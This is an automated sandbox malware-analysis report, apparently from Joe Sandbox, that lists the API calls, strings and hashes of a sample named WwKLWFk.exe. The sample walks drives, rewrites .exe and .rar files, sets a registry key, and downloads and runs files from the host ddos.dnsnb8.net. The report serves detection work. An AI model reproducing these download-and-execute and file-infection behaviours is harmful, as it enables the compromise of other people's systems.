String ID: [json.exception.
API String ID: 4194217158-791563284
Opcode ID: 404475054dbe0d4bd7e8db3ae534b67048968612eb5417280c5f0d9b00f60aa1
Instruction ID: c20e13124c8e298536ded6080801ab43d26a617c4d45a90d379db22c3873c51d
Opcode Fuzzy Hash: 404475054dbe0d4bd7e8db3ae534b67048968612eb5417280c5f0d9b00f60aa1
Instruction Fuzzy Hash: 6D9128709002489FDB18DFA8CC85B9EFBB1FF55314F64425CE448BB692D774A984C791

Function 00E83A90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 150COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00E83C0F

Strings

ios_base::badbit set, xrefs: 00E83BA7, 00E83BD2, 00E83BF3
ios_base::failbit set, xrefs: 00E83AC8

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 2659868963-1240500531
Opcode ID: d3b81b9b22df8adc13444e368e0da86b4b6d9ba919ac2b619d7534d3c394f2d2
Instruction ID: ced74dad8eaed718eff77fce73e794ca9778638d638ad8cbf06681871e818aea
Opcode Fuzzy Hash: d3b81b9b22df8adc13444e368e0da86b4b6d9ba919ac2b619d7534d3c394f2d2
Instruction Fuzzy Hash: BD41E4B1900604ABCB04EF68CC45BAAF7F9FF45710F188219F91DA7681E774AA44CBA1

Function 00EF4250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00EF4AB9
___std_exception_destroy.LIBVCRUNTIME ref: 00EF4AD2
___std_exception_destroy.LIBVCRUNTIME ref: 00EF55DD
___std_exception_destroy.LIBVCRUNTIME ref: 00EF55F6

Strings

value, xrefs: 00EF5503

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: a010f639291026d54c35ddb2048d129fa3eb144a53919d535faabbb3dbea5112
Instruction ID: d9b536a5f9355a658bc44b4006749103a16dab4b1a5ee9419ffa7a598cbf4405
Opcode Fuzzy Hash: a010f639291026d54c35ddb2048d129fa3eb144a53919d535faabbb3dbea5112
Instruction Fuzzy Hash: A3519DB1C0025C9BDF14DFA4CC89BEEBBB4AF15304F144259E505B7382DB74AA889B91

Function 00EF9630 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00EF9681

Strings

type must be string, but is , xrefs: 00EF96E8
type must be boolean, but is , xrefs: 00EF9772

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID: type must be boolean, but is $type must be string, but is
API String ID: 118556049-436076039
Opcode ID: f5eff939d4ca5d7d52854dadaea9be7ec673a81116070c2706b36ea73f186712
Instruction ID: 8ece08fa6eb81acb30c53e8e84c3dac79ddcd912df6b735dcd8a16e870bcfb38
Opcode Fuzzy Hash: f5eff939d4ca5d7d52854dadaea9be7ec673a81116070c2706b36ea73f186712
Instruction Fuzzy Hash: 24316CB1D0024CAFCB08EBA4D842BAD77E9EF04314F140169F919E7693EB39AE04C752

Analysis Process: WwKLWFk.exePID: 7456, Parent PID: 7416COMMON

Execution Graph

Execution Coverage:	32.3%
Dynamic/Decrypted Code Coverage:	10.4%
Signature Coverage:	16.5%
Total number of Nodes:	297
Total number of Limit Nodes:	11

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 002129E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00212A02
wsprintfA.USER32 ref: 00212A1A
memset.MSVCRT ref: 00212A44
lstrlen.KERNEL32(?), ref: 00212A54
lstrcpyn.KERNEL32(?,?,-00000001), ref: 00212A6C
strrchr.MSVCRT ref: 00212A7C
lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00212A9F
lstrlen.KERNEL32(Documents and Settings), ref: 00212AAE
memset.MSVCRT ref: 00212AC6
memset.MSVCRT ref: 00212ADA
FindFirstFileA.KERNEL32(?,?), ref: 00212AEF
memset.MSVCRT ref: 00212B13
lstrcmpiA.KERNEL32(?,?), ref: 00212B42
FindNextFileA.KERNEL32(00000000,?,?,?,?), ref: 00212B67
FindClose.KERNEL32(00000000), ref: 00212B6E

Strings

%s*, xrefs: 00212A14
C:\, xrefs: 00212A2F
Documents and Settings, xrefs: 00212A8D, 00212A92, 00212A9A, 00212AAD

Memory Dump Source

Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true

Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd

Similarity

API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
String ID: %s*$C:\$Documents and Settings
API String ID: 2826467728-110786608
Opcode ID: 23e44c0a9838afca35432c46b56984a5930e3c1641a4fcee9cdec350cced0e92
Instruction ID: c0272ded3822f6bd79b5c60325299b61713d763f0aa3e6779bfd3df709e32c78
Opcode Fuzzy Hash: 23e44c0a9838afca35432c46b56984a5930e3c1641a4fcee9cdec350cced0e92
Instruction Fuzzy Hash: 5B4145B2414349EFD720DF90EC49EDB77ECEBA4315F04482AF945D2111EA35D6AC8BA1

Function 00211718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe), ref: 00211729
SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 0021174C
SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 0021177C
__aulldiv.LIBCMT ref: 00211796
__aulldiv.LIBCMT ref: 002117A8

Strings

C:\Users\user\AppData\Local\Temp\WwKLWFk.exe, xrefs: 00211722
Time, xrefs: 0021173D, 00211766
SOFTWARE\GTplus, xrefs: 00211742, 0021176B

Memory Dump Source

Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true

Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd

Similarity

API ID: TimeValue__aulldiv$FileSystem
String ID: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe$SOFTWARE\GTplus$Time
API String ID: 541852442-923351284
Opcode ID: 68e985296cbf082a7688d0ba414946ae0a134d9328356fb22df64556d3cb0c5a
Instruction ID: e5c133176bc79520fa7c63d2917a043d12cb188a7199783638619f5ef2763fdc
Opcode Fuzzy Hash: 68e985296cbf082a7688d0ba414946ae0a134d9328356fb22df64556d3cb0c5a
Instruction Fuzzy Hash: BA116D71910209BBDB10DA94CC85FEFBBFDEB55714F108115FA04B6280D7719AA58B60

Function 00216076 Relevance: 11.1, APIs: 7, Instructions: 617
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 002160BE
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 002160DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00216189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 002161A5

Memory Dump Source

Source File: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true

Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 2ecd1242d3afdaddd6241aead892a0e94624852eba51f66b99f9dbf36506a709
Instruction ID: 94e99cb00dc994222a715c2b9411b900feccfc262fd5028bf68729030242dd57
Opcode Fuzzy Hash: 2ecd1242d3afdaddd6241aead892a0e94624852eba51f66b99f9dbf36506a709
Instruction Fuzzy Hash: A11258725287869FDB328F24CC497EE3BF5EF22310F18459DDC898B292D274A9A0C751

Function 00212B8C Relevance: 10.6, APIs: 7, Instructions: 74
threadstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00212BA6
GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00212BB4
GetDriveTypeA.KERNEL32(?), ref: 00212BD3
CreateThread.KERNEL32(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 00212BEE
lstrlen.KERNEL32(?), ref: 00212BFB
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00212C16
CreateThread.KERNEL32(00000000,00000000,00212845,00000000,00000000,00000000), ref: 00212C3A

Memory Dump Source

Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true

Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd

Similarity

API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
String ID:
API String ID: 1073171358-0
Opcode ID: fea29eeb05b7de5af4ab6cb7c45a052460c2b8e0a1a7a66c56f9072f8ac66543
Instruction ID: 5d63d200089bbaff38e57529fb294811c1ffcdbe32bc72ebbeade49b201e5824
Opcode Fuzzy Hash: fea29eeb05b7de5af4ab6cb7c45a052460c2b8e0a1a7a66c56f9072f8ac66543
Instruction Fuzzy Hash: BA21D8B180014DEFD720EF64AC88EEE7BEDFB29358B150115F94192151D7208E6ACB60

Function 00211E6E Relevance: 44.1, APIs: 20, Strings: 5, Instructions: 380
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesA.KERNEL32(?,00000080,?,002132B0,00000164,00212986,?), ref: 00211EB9
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00211ECD
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00211EF3
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00211F07
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00211F1D
FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 0021201E
memset.MSVCRT ref: 002120D8
memset.MSVCRT ref: 002120EA
memcpy.MSVCRT ref: 0021222D
UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00212238
FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0021224A
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 002122C6
SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 002122CB
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 002122DD
WriteFile.KERNEL32(000000FF,00214008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 002122F7
WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0021230D
FindCloseChangeNotification.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00212322
UnmapViewOfFile.KERNEL32(?,?,002132B0,00000164,00212986,?), ref: 00212340
FindCloseChangeNotification.KERNEL32(?,?,002132B0,00000164,00212986,?), ref: 0021234E
FindCloseChangeNotification.KERNEL32(000000FF,?,002132B0,00000164,00212986,?), ref: 00212359

Strings

C@!, xrefs: 0021229E
<@!, xrefs: 00212290
m@!, xrefs: 00211E8F, 0021225A
.@!, xrefs: 00212274
5@!, xrefs: 00212282

Memory Dump Source

Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true

Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd

Similarity

API ID: File$ChangeCloseFindNotificationView$Pointer$CreateUnmapWritememset$AttributesFlushMappingmemcpy
String ID: .@!$5@!$<@!$C@!$m@!
API String ID: 386175886-1914238424
Opcode ID: d0677529d8aa6787c492c7cf550bf9e0b5f96877745863a5f90d376175a0ca1f
Instruction ID: 3d6d19a161a0208b637c0a0967ff36626d69119ace0bd4a761226156ea128cdf
Opcode Fuzzy Hash: d0677529d8aa6787c492c7cf550bf9e0b5f96877745863a5f90d376175a0ca1f
Instruction Fuzzy Hash: 25F13571910209EFCB20DFA4D884AEDBBF5FF28314F10852AE519A7661D730AEA5CF50

Function 00211973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsA.SHLWAPI(\N!`N!,00000000,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe), ref: 00211992
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 002119BA
Sleep.KERNEL32(00000064), ref: 002119C6
wsprintfA.USER32 ref: 002119EC
CopyFileA.KERNEL32(?,?,00000000), ref: 00211A00
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00211A1E
GetFileSize.KERNEL32(?,00000000), ref: 00211A2C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00211A46
ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00211A65
FindCloseChangeNotification.KERNEL32(000000FF), ref: 00211A90
DeleteFileA.KERNEL32(?), ref: 00211AA7
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00211AC1

Strings

C:\Users\user\AppData\Local\Temp\WwKLWFk.exe, xrefs: 0021197C
C:\Users\user\AppData\Local\Temp\, xrefs: 002119DB
\N!`N!, xrefs: 00211980
%s%.8X.data, xrefs: 002119E6

Memory Dump Source

Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true

Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd

Similarity

API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\WwKLWFk.exe$\N!`N!
API String ID: 2523042076-3475033246
Opcode ID: 222b2a97c017c6ea3a0c679baacd86a288fbd4d9bf09c6f24fc1d635f9f5f777
Instruction ID: efec82e25891e7701b4cd7022192df0cd89c6b1928a7fc2116c0363332c1e173
Opcode Fuzzy Hash: 222b2a97c017c6ea3a0c679baacd86a288fbd4d9bf09c6f24fc1d635f9f5f777
Instruction Fuzzy Hash: 14515C7191121AAFCF10DF98DC88AEEBFF9EF29354F104569F615A2190D7709EA0CB90

Function 002128B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 002128D3
wsprintfA.USER32 ref: 002128F7
memset.MSVCRT ref: 00212925
wsprintfA.USER32 ref: 00212940

Part of subcall function 002129E2: memset.MSVCRT ref: 00212A02
Part of subcall function 002129E2: wsprintfA.USER32 ref: 00212A1A
Part of subcall function 002129E2: memset.MSVCRT ref: 00212A44
Part of subcall function 002129E2: lstrlen.KERNEL32(?), ref: 00212A54
Part of subcall function 002129E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00212A6C
Part of subcall function 002129E2: strrchr.MSVCRT ref: 00212A7C
Part of subcall function 002129E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00212A9F
Part of subcall function 002129E2: lstrlen.KERNEL32(Documents and Settings), ref: 00212AAE
Part of subcall function 002129E2: memset.MSVCRT ref: 00212AC6
Part of subcall function 002129E2: memset.MSVCRT ref: 00212ADA
Part of subcall function 002129E2: FindFirstFileA.KERNEL32(?,?), ref: 00212AEF
Part of subcall function 002129E2: memset.MSVCRT ref: 00212B13

strrchr.MSVCRT ref: 00212959
lstrcmpiA.KERNEL32(00000001,exe), ref: 00212974

Strings

rar, xrefs: 00212988
C:\Users\user\AppData\Local\Temp\, xrefs: 002129B3
%s\, xrefs: 0021293A
exe, xrefs: 0021296D
%s%s, xrefs: 002128F1

Memory Dump Source

Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true

Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd

Similarity

API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
API String ID: 3004273771-1101464738
Opcode ID: daba20b8defdf30f5b4492d0717ef2b43b93e65a556f913f177b58c1fe5d391f
Instruction ID: 9bd34a89fa16f1f94418b06895a86d309ff68ce5411851e1589e0ff0a63c2210
Opcode Fuzzy Hash: daba20b8defdf30f5b4492d0717ef2b43b93e65a556f913f177b58c1fe5d391f
Instruction Fuzzy Hash: E331A97195031DBBDB20EB68DC89FDA77DDDF35310F140452F545A2081EAB5AAF88BA0

Function 00211099 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 74
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0021185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,77068400,http://%s:%d/%s/%s,?,?,?,00211118), ref: 00211867
Part of subcall function 0021185B: srand.MSVCRT ref: 00211878
Part of subcall function 0021185B: rand.MSVCRT ref: 00211880
Part of subcall function 0021185B: srand.MSVCRT ref: 00211890
Part of subcall function 0021185B: rand.MSVCRT ref: 00211894

WinExec.KERNEL32(?,00000005), ref: 002110F1
lstrlen.KERNEL32(00214748), ref: 002110FA
wsprintfA.USER32 ref: 0021112A
wsprintfA.USER32 ref: 00211143
URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0021115B
lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00211169
Sleep.KERNEL32 ref: 00211179

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00211119
ddos.dnsnb8.net, xrefs: 002110C8, 002110CF, 00211140, 00211168
http://%s:%d/%s/%s, xrefs: 002110C2, 00211141
%s%.8X.exe, xrefs: 00211124
HG!, xrefs: 0021112C
cj/, xrefs: 00211135

Memory Dump Source

Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true

Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd

Similarity

API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HG!$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1280626985-1854692352
Opcode ID: 5d9d9e483675ae9376c174f362af9dfb5dc9a8b6a5fb0e18891c928a110d5407
Instruction ID: ff4b7c3ac1cb27c5eda504b26a4521f3431abbf1105f8da4c2c56ad56ab62aeb
Opcode Fuzzy Hash: 5d9d9e483675ae9376c174f362af9dfb5dc9a8b6a5fb0e18891c928a110d5407
Instruction Fuzzy Hash: E0218375910249BADB10EBA0EC48FEFBBFDAB25315F118055E608A2050DB745BE4CF50

Function 00211638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70
stringsynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 0021164F
GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 0021165B
GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\WwKLWFk.exe,00000104), ref: 0021166E
CreateThread.KERNEL32(00000000,00000000,Function_00001099,00000000,00000000,00000000), ref: 002116AC
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 002116BD

Part of subcall function 0021139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe), ref: 002113BC
Part of subcall function 0021139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 002113DA
Part of subcall function 0021139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00211448

lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe), ref: 002116E5

Strings

C:\Users\user\AppData\Local\Temp\WwKLWFk.exe, xrefs: 00211662, 00211667, 002116DD
C:\Users\user\AppData\Local\Temp\, xrefs: 00211644
Documents and Settings, xrefs: 00211696
C:\Windows\system32, xrefs: 00211656

Memory Dump Source

Source File: 00000004.00000002.1418727030.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true

Associated: 00000004.00000002.1418708719.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418776813.0000000000214000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1418801039.0000000000216000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_210000_WwKLWFk.jbxd

Similarity

